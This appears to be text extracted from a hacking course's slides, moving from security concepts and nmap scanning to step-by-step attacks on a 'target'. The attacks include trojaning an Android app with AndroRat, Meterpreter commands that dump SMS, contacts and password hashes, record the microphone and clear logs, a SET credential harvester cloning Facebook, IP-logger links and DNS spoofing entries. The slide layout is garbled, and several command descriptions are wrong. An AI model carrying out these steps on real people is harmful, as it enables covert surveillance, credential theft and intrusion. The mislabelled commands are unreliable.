Professional Documents
Culture Documents
Platform
Disaster and
Recovery Application
Elements Security
of Cyber
Security
Network Information
Security Security
Elements of Cyber Security
End-user Compliance: Creating a security awareness training
program.
Information Security: Protected against the unauthorized use of
information
Platform and Application Security: Find information on
software vulnerability and threat management, application
attacks, software security tools, application firewalls, software
patching and more.
Network Security: Network security consists of the policies and
practices adopted to prevent and monitor unauthorized access,
misuse, modification or denial of a computer network and
network-accessible resources.
Disaster Recovery: Documented process or set of procedures
to recover and protect a business IT infrastructure in the event of
a disaster.
What is Hacking?
Identifying weakness in computer systems Software or
Networks to exploit its weaknesses to gain access.
Who is Hacker?
A Hacker is a person who finds and exploits the weakness in computer
systems and/or networks to gain access. Hackers are usually skilled computer
programmers with knowledge of computer security.
Types of Hackers
White Hat: Identify the weakness in the System/Network for the organization
Black Hat: Identify the Weakness in the System/Network to steal data and
demand the money.
Gray Hat: Identify the weakness in the System/Network for the offence and
defence.
Script Kiddies: Use only Tools without any conceptual knowledge.
Phases of Hacking
Target Scoping
Reconnaissance Passive Information
Scanning Active Information
Vulnerability Analysis
Building Exploit
Attack and Gain Access
Maintaining Access
Clearing Tracks or Reporting
Hacking Terminology
Vulnerability
Bug or Weakness in the Software
Exploit
Make use of (a situation) in a way considered unfair or
underhand.
Payload
A payload refers to the component of a computer virus
that executes a malicious activity
Hacking Terminology
Tor
Browser
VPN /
Proxies
https://www.mailinator.com https://www.guerrillamail.com
http://mailexpire.com http://www.fakeinbox.com
Foot Printing
Reconnaissance
Organization Individual
Website Details Email Details
DNS and Name Servers Information Any other Contacts Information if Possible
Internet Backbone
MSPs
ISPs
Basics of Networking
Basics of Networking
STM 4
NW P.NO
DATA 1 0 0 202 1
CENTER 198.142.36.16 NW P.No
198 0
1 202 3
198 2
0 1
NW P.No
3 0 IAB
202 2 2
1
198 0 3
2
DNS
n or I n bI
NW P.No c
e g f z
1 3 o o
202 3 m t
0 2
198 1 2
0
3 1
NW P.No
B M
A W N D 202 2
I A
A W A N 198 3
L I
A W T S
L L
10.1.1.1
N W P. No
10.1.1.2
S 202 0
W R 1 IP Packet
10.1.1.3 I A F 0 1 0 198 1
T S - T P - C D
C S W I - T R - R DATA I
10.1.1.4 H
202.11.65.24 P - L O - C P
10.1.1.1
202.11.65.10
10.1.1.1 198.142.36.42
The OSI Model
Open Systems Interconnection
6 6 Presentation
Presentation Application
5 5 Session
Session
4 4 Transport
Transport TCP
3 3 Network
Network IP
2 2 Datalink
Datalink
Host - to - Network
1 1 Physical
Physical
IP Addresses Classification
Class Starting Ending
192 . 14 . 26 . 7
IP Header
192 . 14 . 26 . 7
IP Address
UDP Header 13 Selects the host
ICANN ranges
Registered
1,024 49,151
Linux
bash# ifconfig - Display IP Address Information
URG (Urgent): This flag is used to identify incoming data as 'urgent'. Such incoming
segments do not have to wait until the previous segments are consumed by the
receiving end but are sent directly and processed immediately.
PSH (Push): The Push flag, like the Urgent flag, exists to ensure that the data is given
the priority (that it deserves) and is processed at the sending or receiving end.
RST (Reset): This indicates that the remote host has reset the connection.
Stealth Mode
This scan is also known as half open scan. Because nmap will confirm ports are open
on destination side, when destination ports is making two way handshake with attacker
or nmap.
Syn
Sys / Ack
Port is Open
Syn
Rst
Port is Closed
Firewall does not raise alarm if it is two way handshake. If the 3 way handshake cases if
the IP is from outside firewall raises the alarm.
#nmap sS 192.168.0.146
Note: it only scans 1000 Important ports.
Closed: Target Software is Not Running
Open: Service is running and allowing connections
Filtered: Service is running behind the Firewall.
TCP Connect Scan
Syn
Sys / Ack
Ack
Port is Open
Syn
Rst
Port is Closed
This scan is also known as Full Open Scan because nmap confirms ports are open
when nmap is able to make 3 Way handshake with Destination Computer Ports.
#nmap sT 192.168.0.150
Other Scan Options
Software Version Scan
#nmap sV 192.168.0.146
It check for the software versions running in the Server/Target.
FIN
FIN
Rst
Port is Closed and Target is Windows
Note: Honeypots are creating a feeling that target has a different Operating System
Other Scan Options
XMAS Scan
#nmap sX 192.168.0.146
It check for the OS running in the Server/Target.
Passwords: crunch
Generate Passwords
#crunch 5 8 someguess o destinationname.txt
Paste the Link in the Website and Collect the Short URL from Website.
Send the Link to Target using Email or any other Social Networking Services.
Refresh the Website for Updates and you will get the IP Details of the Target if
the Target Click on the Link
Social Engineering Techniques
Get Read Notification of Mail
Step 1: Open http://readnotify.com Website and Register the Mail ID
Step 2: Login into Your Mail, Compose mail and Select the TargetMail Id
and add .readnotify.com at end of the Traget Mail Id and Send the Mail.
Ex: clabs@gmail.com.readnotify.com
Virus: A piece of code which is capable of copying itself and corrupting the system or
destroying data.
Worms: It is a standalone malware computer program that replicates itself in order to spread to
other computers.
Root Kits: It is designed to hide the fact that an operating system has been compromised.
Ransom Wares: Ransomware is a type of malicious software that blocks access to the victim's
data.
Crypters: Crypters are software tools that use a combination of encryption, obfuscation, and
code manipulation
Trojen / Rat
Trojan / RAT (Remote Administration Tool), is a malicious
computer program which is used to hack into a computer by
misleading users of its true intent.
1. Darkcomnet Rat
2. Pro Rat
3. Sub 7
4. Poison ID Rat
5. Zues Rat
6. Cyber Gate Rat
7. Cerve Virus Rat
8. Turkogan Rat
9. Spy Eye
10. NJ Rat
11. Stuxnet
Social Engineering Techniques
Hack Windows System using Social Engineering and
Darkcomet Rat Tool
Social Engineering Techniques
Hack Android Mobile using Social
Engineering and Andro Rat Tool
1. Dowload Andro Rat Software and Run Andro Rat Binder
2. Upload any Apk File to Attach the RAT along with APK using Build+Bind Option
Or
Use only Bind Option to Attach the RAT File with an Inbuilt APK File
3. Press go to Generate the APK File.
4. Use Social Engineering to Make Install of APK file in Target Mobile and Run.
5. Run androrat tool present in the Androrat Directory to Capture the Information from
the Android Mobile.
Network Models in Social Engineering
Attacker and Target are in the Same Network
Network Models in Social Engineering
Attacker and Target are in Public Networks
Network Models in Social Engineering
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
Network Models in Social Engineering
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
Step 1: Port Forwarding (This only if the Router has Public IP Address)
Hackers
Social Engineering
Functionality
Lack of Knowledge and Awareness
Security Usability
Prerequisites
1. Basics of Linux
2. Basics of Windows
3. Basics of Networking
4. Working with Virtual Box and Network Configurations
5. Working with Kali
6. Working with Tor Browser
7. Working with VPN and VPN Tools
8. Creating Fake Mail IDs for Temporary Purpose to Register in
Different Websites Ex: Mailinator.com
9. Get the Public IP Address -> grabify ip logger (grabify.link)
10. Get the Temparary Domain Name -> noip.com
Vulnerability Research
The Process of discovering vulnerabilities and design Flaws. That will open an
operating system and its applications through attack or misuse.
Vulnerabilities are classified based on security level, severity level like low,
medium or high and exploit range local or remote.
Some Websites
1. Securityfocus.com
2. packetstormsecurity.com
3. us-cert.gov (Computer Emergency Response Team)
4. www.exploit-db.com
5. www.thehackernews.com
System Hacking with Meta Sploit
Exploit: It is a piece of malicious program code which takes help of
vulnerability to compromise the target computer and executes the payload for
controlling remote computers.
Types of Exploits:
1. Public Exploits
2. Private Exploits (Zero Day Exploit)
1. msfconsole
2. msfvenom
3. armitage
Hacking with Meta Sploit
List of Modules available in msfconsole (6 Modules)
1. Exploits
2. Auxilary (Network Scanners, Port Scanners, Enumeration Tools, Dos Attack
Tools)
3. Payload
4. Post (Pattern Lock Remove, rooted phone whatsapp data)
5. Encoders (Without Recognize Payload) (Crypters Softwares using the
Payload)
6. Nop (No Operation Buffer Overflow Attacks)
7. msf> exploit
List of Android Meterpreter Commands
1. meterpreter> sysinfo -> System Information
2. meterpreter> hide_app_info -> Hide App Icon
3. meterpreter> check_root -> Phone is Rooted or not
4. meterpreter> dump_calllog -> All Logs will be Saved
5. meterpreter> dump_contacts -> All Contacts will be Stored
6. meterpreter> dump_sms -> Display all the Key Logger Recorded Data
7. meterpreter> record_mic d 15 -> Record the Voice
8. meterpreter> webcam_list -> Cameras List
9. meterpreter> webcam_snap /Webcam_snap i 2 ->Take the Screenshot
10.meterpreter> shell -> Display the List of Web Cams
11.shell> download <src> <destination> -> Download File from Phone
12. shell> upload <src> <destination> -> Upload File to Phone
List of Meterpreter Commands
14. meterpreter> cd <path> -> Change the Directories
15.meterpreter> upload source dest -> Upload the File
1. Note: We can add attrib +h +s +r <filename> -> To hide the File
16.meterpreter> shell
17.meterpreter> download source dest -> Download the file
18.meterpreter> clearev
19. meterpreter> get privs -> Get all the privileges
20. meterpreter> migrate <processid> -> Move to a given process id process to
get more privileges
21. meterpreter> hashdump -> Extract Windows Account Password
22. meterpreter> background -> Minimize the Interpreter
23. meterpreter> sessions -l -> View Sessions
24. meterpreter> search bypassuac -> This record the voice but max 15 Secs
Phishing Attacks
Phishing: Phishing Emails are POPUPs Redirect the User to fake web pages for
cloning Trust worthy sites that ask them to submit their personal Information.
Site: z-shadow.co / shadowwave.com
Kali Linux Tools: Application -> Social Engineering Tools -> SET (Social
Engineering Tool Kit)
Set>1 Step 1: Social Engineering Attacks
Set>2 Step 2: Website Attack Vectors
Set>3 Step 3: Credential Harvester Attack Method
Set>2 Step 4: Cloner
Set>192.168.10.106 Step 5: Enter IP Address where to Capture Information
Set>http://www.facebook.com Step6: Select the Website to Create the Fake Website
--------------------------
Capture Data using Sniffers and Identify the Passwords if the User Entered Information
Filters: http.request.method=POST
DNS Poisoning
It is a technique that tricks a DNS Server into believing that it has received authentic
Information when in reality it has not. It results in substitution of a false IP Address at
the DNS level where web addresses are converted into numeric IP Address. It allows
attacker to replace IP Address entries for a target site on a given DNS Server with IP
Address of the Server he/she controls.
Step1: create a file and write the Entries in the Following way
192.168.10.6 www*
192.168.10.6 login*
192.168.10.6 accounts*
192.168.10.6. http*
Types of Cryptors:
1. Public
2. Demo Crypter
3. Private or Zero Day Crypter